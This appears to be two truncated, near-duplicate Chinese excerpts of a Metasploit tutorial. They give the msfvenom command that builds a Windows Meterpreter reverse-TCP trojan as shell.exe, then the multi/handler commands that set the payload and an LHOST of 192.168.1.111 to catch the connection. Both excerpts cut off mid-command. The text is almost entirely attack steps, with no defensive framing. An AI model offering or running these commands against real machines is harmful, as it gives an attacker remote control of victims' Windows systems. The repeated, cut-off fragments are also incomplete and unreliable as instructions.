1.生成反弹木马(脚本,执行程序) msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o shell.exe 2.MSF接受设置 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.111 E…
1.生成反弹木马(脚本,执行程序) msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o shell.exe 2.MSF接受设置 1 use exploit/multi/handler 2 set payload windows/meterpreter/reverse_tcp 3 set LHOST 192.168.1…